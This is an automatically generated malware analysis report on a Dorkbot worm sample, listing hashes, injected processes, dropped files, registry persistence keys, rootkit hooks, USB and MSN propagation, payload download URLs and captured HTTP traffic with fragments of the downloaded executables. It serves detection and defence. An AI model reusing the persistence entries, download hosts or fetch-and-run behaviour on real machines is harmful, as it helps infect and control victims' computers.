Worm.Win32.Dorkbot_2c9bc71e06

by malwarelabrobot on June 27th, 2014 in Malware Descriptions.

Trojan.Win32.Yakes.fetz (Kaspersky), Trojan.GenericKD.1729296 (B) (Emsisoft), Trojan.GenericKD.1729296 (AdAware), Backdoor.Win32.Farfli.FD, Worm.Win32.Dorkbot.FD, mzpefinder_pcap_file.YR, Sinowal.YR, WormDorkbot.YR, GenericUDPFlooder.YR, GenericIRCBot.YR, GenericMSNWorm.YR, GenericUSBInfector.YR, GenericDNSBlocker.YR, GenericDownloader.YR, GenericAutorunWorm.YR, GenericSYNFlooder.YR, GenericInjector.YR, BankerGeneric.YR, GenericProxy.YR, GenericPhysicalDrive0.YR (Lavasoft MAS)
Behaviour: Banker, Trojan, Backdoor, Flooder, Worm, WormAutorun, IRCBot, MSNWorm, DNSBlocker, UDPFlooder, SYNFlooder, Trojan-Proxy, USBInfector

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

Dynamic Analysis

Static Analysis

Network Activity

Map

Strings from Dumps

Removals

MD5: 2c9bc71e0663e3dffbcbc9bba34d5a46
SHA1: b794273026c1982633a83bed4a78124345e9d731
SHA256: 6b7edea3ae7159eab46be22596621633c81ec81503508ace4755d0d46636c7b0
SSDeep: 3072:fnHeP7t5dCyqMjoiLu/sAg0Fu0Ws13WyHXPvW2AU:/Y7T5ceMsAOlQwU
Size: 175616 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: firseria sl
Created at: 2014-06-23 19:36:51
Analyzed on: WindowsXP SP3 32-bit

Summary:

Worm. A program that is primarily replicating on networks or removable drives.

Payload

Behaviour	Description
WormAutorun	A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Worm's file once a user opens a drive's folder in Windows Explorer.
IRCBot	A bot can communicate with command and control servers via IRC channel.
MSNWorm	A worm can spread its copies through the MSN Messanger.
DNSBlocker	A program can block designated DNS servers for making it difficult for users to locate specific domains or web sites on the Internet.
UDPFlooder	This program can make a UDP flood. A UDP flood attack is a denial-of-service attack using the User Datagram Protocol (UDP). It can be initiated by sending a large number of UDP packets to random ports on a remote host.
SYNFlooder	This program can make a SYN flood. It is a form of denial-of-service attack in which an attacker sends a succession of SYN requests to a target's system in an attempt to consume enough server resources to make the system unresponsive to legitimate traffic.
Trojan-Proxy	This program can launch a proxy server (SOCKS4) on a designated TCP port.
USBInfector	A program can register a device notification with the help of RegisterDeviceNotification. So it is notified when a USB device is plugged and then the worm copies itself to the USB device plugged into the affected computer.

Process activity

The Worm creates the following process(es):

dfwef.exe:808
dfwef.exe:1180
fsdgs.exe:616
fsdgs.exe:1100
%original file name%.exe:856
fdsfifew.exe:1648
fdsfifew.exe:1952
f3ed.exe:2100
f3ed.exe:2232

The Worm injects its code into the following process(es):

calc.exe:264
notepad.exe:376
%original file name%.exe:1312
vmacthlp.exe:924
svchost.exe:1340
winlogon.exe:712
services.exe:756
svchost.exe:940
svchost.exe:1020
svchost.exe:1104
svchost.exe:1152
svchost.exe:1216
spoolsv.exe:1440
wmiprvse.exe:1564
Explorer.EXE:1572
jqs.exe:1592

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process dfwef.exe:808 makes changes in the file system.
The Worm creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\My Documents\My Videos\Desktop.ini (312 bytes)

The Worm deletes the following file(s):

%Program Files%\Common Files\CreativeAudio\desktop.ini (0 bytes)

The process calc.exe:264 makes changes in the file system.
The Worm creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\c731200 (9 bytes)

The process %original file name%.exe:1312 makes changes in the file system.
The Worm creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6J2ZSR8X\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\QMJ67ZRX\bet[1].exe (83247 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\QMJ67ZRX\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4LUJ4TIB\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IIGAYS9V\spm[1].exe (45921 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\f3ed.exe (19495 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6J2ZSR8X\dqnew[1].exe (21051 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\fdsfifew.exe (46039 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IIGAYS9V\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4LUJ4TIB\ng[1].exe (51385 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\fsdgs.exe (42792 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\dfwef.exe (77496 bytes)

The Worm deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\fsdgs.exe (0 bytes)

The process fdsfifew.exe:1648 makes changes in the file system.
The Worm creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\c731200 (673 bytes)

The Worm deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\fdsfifew.exe.gonewiththewings (0 bytes)

The process f3ed.exe:2232 makes changes in the file system.
The Worm creates and/or writes to the following file(s):

C:\RECYCLER\S-1-5-21-0243556031-888888379-781863308-16678766\a5456663.exe (601 bytes)
C:\RECYCLER\S-1-5-21-0243556031-888888379-781863308-16678766\Desktop.ini (63 bytes)

Registry activity

The process dfwef.exe:808 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "55 67 CD 32 C3 5B C9 66 C4 F5 19 E3 3A 76 8B 55"

[HKCU\Software\Win7zip]
"uuid" = "BB 43 10 20 55 3B 3D 44 BA 8C CE 0F 9A E1 3D 51"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"My Video" = "%Documents and Settings%\%current user%\My Documents\My Videos"
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Classes\CLSID\{BB431020-553B-3D44-BA8C-CE0F9AE13D51}\0E7302EC\CG1]
"BID" = "20 00 08 00 1A 00 06 00 DE 07 00 00 14 00 88 FF"
"HAL" = "05 EE 00 00"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rqmynangs.exe]
"DisableExceptionChainValidation" = ""

The process dfwef.exe:1180 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7E 59 DB 9E F0 09 7C 7F 2F 58 27 A9 72 9B 20 24"

The process calc.exe:264 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "60 2B 2E 00 3B B3 55 72 CE 6E D1 78 80 A5 EB 42"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"My Video" = "%Documents and Settings%\%current user%\My Documents\My Videos"
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

The process fsdgs.exe:616 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FA 9E 16 40 EE 77 4D 7A 20 BB DA 77 7D 83 77 63"

The process fsdgs.exe:1100 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4C 1D 29 BC 2D DC E2 B0 B4 D5 28 E3 72 BD 9A DE"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKCU\Software\VRTWatchdog]
"PerfData" = "31 30 30 35 33 37 30 32 31 35 38 33 35 32 37 31"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"My Video" = "%Documents and Settings%\%current user%\My Documents\My Videos"

To automatically run itself each time Windows is booted, the Worm adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"MicrosoftPerfWD" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\fsdgs.exe"

The process notepad.exe:376 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Video" = "%Documents and Settings%\%current user%\My Documents\My Videos"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "79 49 AB 4E 84 32 7D 03 CF 49 E5 34 B9 BB 06 2A"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Worm modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Worm modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

To automatically run itself each time Windows is booted, the Worm adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Uukmkg" = "%Documents and Settings%\%current user%\Application Data\Identities\Uukmkg.exe"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Worm modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Worm deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process %original file name%.exe:1312 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:

[HKCU\Software\Classes\CLSID\{BB431020-553B-3D44-BA8C-CE0F9AE13D51}\0E7302EC\CW1]
"1312" = "88 00 00 00 EC 00 00 00 8D F1 FF 00 E8 00 0D 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Video" = "%Documents and Settings%\%current user%\My Documents\My Videos"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C1 C4 21 00 17 CB 6B 2B EE 0A 1D E4 22 1C C7 A2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Worm modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Worm modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Worm modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Worm deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process fdsfifew.exe:1648 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BD 27 F0 40 B7 9D 9E C7 63 EB 9D 69 C3 98 24 6D"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

The process fdsfifew.exe:1952 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "02 FC FF B5 9B 63 49 98 6B 70 2F 52 F9 4A 1A FF"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

The process f3ed.exe:2100 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "87 03 BF 5D FE 85 87 7B E1 A5 C4 7D B8 0C 49 56"

The process f3ed.exe:2232 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1C 18 46 06 F6 A4 F3 57 C2 B5 AE 3E 51 50 83 8B"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Taskman" = "C:\RECYCLER\S-1-5-21-0243556031-888888379-781863308-16678766\a5456663.exe"

To automatically run itself each time Windows is booted, the Worm adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"a754353" = "C:\RECYCLER\S-1-5-21-0243556031-888888379-781863308-16678766\a5456663.exe"

The Worm adds the reference to itself to be executed when a user logs on:

[HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell" = "explorer.exe,C:\RECYCLER\S-1-5-21-0243556031-888888379-781863308-16678766\a5456663.exe"

Dropped PE files

MD5	File path
8f10dfef8256dde22f28e746927c6b2d	c:\Documents and Settings\"%CurrentUserName%"\Application Data\c731200
8f10dfef8256dde22f28e746927c6b2d	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Adobe\Reader_sl.exe
8f10dfef8256dde22f28e746927c6b2d	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\fdsfifew.exe.gonewiththewings
56d630439c0d0a87eedd22ab43b62004	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\fsdgs.exe
8f10dfef8256dde22f28e746927c6b2d	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\4LUJ4TIB\ng[1].exe
56d630439c0d0a87eedd22ab43b62004	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\IIGAYS9V\spm[1].exe
2582c609319aca439e5d1c367b526855	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\QMJ67ZRX\bet[1].exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

The Worm installs the following user-mode hooks in WININET.dll:

HttpSendRequestW
InternetWriteFile
HttpSendRequestA

The Worm installs the following user-mode hooks in DNSAPI.dll:

DnsQuery_A
DnsQuery_W

The Worm installs the following user-mode hooks in WS2_32.dll:

send
GetAddrInfoW

The Worm installs the following user-mode hooks in kernel32.dll:

MoveFileA
CopyFileW
CopyFileA
MoveFileW
CreateFileW
CreateFileA

The Worm installs the following user-mode hooks in ntdll.dll:

LdrLoadDll
NtResumeThread
NtQueryDirectoryFile
NtEnumerateValueKey

Propagation

A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Worm's file once a user opens a drive's folder in Windows Explorer.
A program can register a device notification with the help of RegisterDeviceNotification. So it is notified when a USB device is plugged and then the worm copies itself to the USB device plugged into the affected computer.
A worm can spread its copies through the MSN Messanger.

VersionInfo

No information is available.

PE Sections

Name	Virtual Address	Virtual Size	Raw Size	Entropy	Section MD5
.text	4096	86925	87040	4.60448	17de12c50d184fc7b1053f44b6107e62
.rdata	94208	32916	33280	4.34741	9cf08e1e40798f7c2163f60b05236207
.data	131072	21156	10240	4.00992	5aa418b1c990a93177e52ccfbe81d004
.rsrc	155648	43676	44032	4.87293	0c04b6b7958d764996258b3c755f0b25

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL	IP
hxxp://54.193.9.202/ng.exe
hxxp://54.183.79.85/spm.exe
hxxp://api.wipmania.com/	68.64.170.190
hxxp://91.238.134.77/bet.exe
hxxp://54.193.9.202/dqnew.exe
mx1.hotmail.com	65.55.92.152

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile
ET TROJAN Dorkbot GeoIP Lookup to wipmania
ET MALWARE Suspicious Mozilla User-Agent - Likely Fake (Mozilla/4.0)
ET POLICY External IP Lookup Attempt To Wipmania

Traffic

GET /spm.exe HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: 54.183.79.85

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Thu, 26 Jun 2014 10:50:35 GMT

Server: Apache/2.2.27 (Amazon)

Last-Modified: Thu, 26 Jun 2014 09:45:18 GMT

ETag: "20f71-25e00-4fcba0cf406fa"

Accept-Ranges: bytes

Content-Length: 155136

Connection: close

Content-Type: application/octet-stream

MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......<.1fx._5x
._5x._5...5z._5q..5l._5q..5o._5q..50._5q..5s._5x.^5.._5f..5y._5f..5y._
5f..5y._5Richx._5........................PE..L......S.................
[email protected].................
.............................t............T...........................
...............................x...@..................................
..........text............................... ..`.rdata..n:.......<
..................@[email protected]...`........ [email protected]...
.T.......V..................@..@......................................
......................................................................
......................................................................
......................................................................
......................................................................
..................................................U......E."....E.Q...
.E.6....E.c....E.C......A.;E.}..M...0.U. ..U....A...R.M. ..M..U.3U..U.
.E...]................U......E.*....E.-....E.:....E.Q....E.%....E.R...
...A...6.M. ..M..U....A..L......A..U...7...A. ....A..M..M.....A. .....
A..E..E..E..E...].........U......E.J....E.b....E......E......E. ....E.
.......E.....E..}..}W.}.E}[email protected]....@.
[email protected]. ..M....U.3U..U..E...].........U......E
.9....E.=....E./[email protected]. ..M.....A.R...A.P...

<<< skipped >>>

GET /ng.exe HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: 54.193.9.202

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Thu, 26 Jun 2014 10:50:10 GMT

Server: Apache/2.2.27 (Amazon)

Last-Modified: Thu, 26 Jun 2014 09:45:30 GMT

ETag: "20f72-2ce00-4fcba0db446be"

Accept-Ranges: bytes

Content-Length: 183808

Connection: close

Content-Type: application/octet-stream

MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......<..bx..1x
..1x..1...1z..1q.J1l..1q.[1o..1q.\10..1q.L1s..1x..1...1f.[1y..1f.K1y..
1f.N1y..1Richx..1................PE..L......S....................."...
...=K............@....................................................
.....................t................................................
[email protected]..........................
..text............................... ..`.rdata...9.......:...........
.......@[email protected]............ [email protected]..............
.................@..@.................................................
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U......E."....E.Q....E.
6....E.c....E.C......A.;E.}..M...0.U. ..U....A...R.M. ..M..U.3U..U..E.
..]................U......E.*....E.-....E.:....E.Q....E.%....E.R......
A...6.M. ..M..U....A..L......A..U...7...A. ....A..M..M.....A. .....A..
E..E..E..E...].........U......E.J....E.b....E......E......E. ....E....
....E.....E..}..}W.}.E}[email protected][email protected].
[email protected]. ..M....U.3U..U..E...].........U......E.9.
...E.=....E./[email protected]. ..M.....A.R...A.P......

<<< skipped >>>

GET /dqnew.exe HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: 54.193.9.202

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Thu, 26 Jun 2014 10:51:07 GMT

Server: Apache/2.2.27 (Amazon)

Last-Modified: Thu, 26 Jun 2014 09:45:34 GMT

ETag: "20f92-16000-4fcba0decdb5c"

Accept-Ranges: bytes

Content-Length: 90112

Connection: close

Content-Type: application/octet-stream

MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......<.1.x._Ax
._Ax._A...Az._Aq..Al._Aq..Ao._Aq..A0._Aq..As._Ax.^A.._Af..Ay._Af..Ay._
Af..Ay._ARichx._A........................PE..L......S.................
[email protected].................
..........................................V...........................
...................................@..................................
..........text............................... ..`.rdata...:.......<
..................@[email protected]............ [email protected]...
.V.......X..................@..@......................................
......................................................................
......................................................................
......................................................................
......................................................................
..................................................U......E."....E.Q...
.E.6....E.c....E.C......A.;E.}..M...0.U. ..U....A...R.M. ..M..U.3U..U.
.E...]................U......E.*....E.-....E.:....E.Q....E.%....E.R...
...A...6.M. ..M..U....A..L......A..U...7...A. ....A..M..M.....A. .....
A..E..E..E..E...].........U......E.J....E.b....E......E......E. ....E.
.......E.....E..}..}W.}.E}[email protected]....@.
[email protected]. ..M....U.3U..U..E...].........U......E
.9....E.=....E./....E.-....E.7.....|[email protected]. ..M.....A.R...A.P...

<<< skipped >>>

GET / HTTP/1.1

User-Agent: Mozilla/4.0

Host: api.wipmania.com


HTTP/1.1 200 OK

Server: nginx

Date: Thu, 26 Jun 2014 10:50:41 GMT

Content-Type: text/html

Content-Length: 21

Connection: keep-alive

Keep-Alive: timeout=20
193.138.244.231<br>UAHTTP/1.1 200 OK..Server: nginx..Date: Thu, 
26 Jun 2014 10:50:41 GMT..Content-Type: text/html..Content-Length: 21.
.Connection: keep-alive..Keep-Alive: timeout=20..193.138.244.231<br
>UA..

GET /bet.exe HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: 91.238.134.77

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Thu, 26 Jun 2014 10:10:28 GMT

Server: Apache/2

Last-Modified: Thu, 26 Jun 2014 08:15:29 GMT

ETag: "240845-46400-4fcb8cbba2a40"

Accept-Ranges: bytes

Content-Length: 287744

Keep-Alive: timeout=1, max=100

Connection: Keep-Alive

Content-Type: application/x-msdownload

MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......<.1`x._3x
._3x._3...3z._3q..3l._3q..3o._3q..30._3q..3s._3x.^3.._3f..3y._3f..3y._
3f..3y._3Richx._3................PE..L......S.........................
[email protected].........................
.....................t............[...................................
.......................x...@...............|..........................
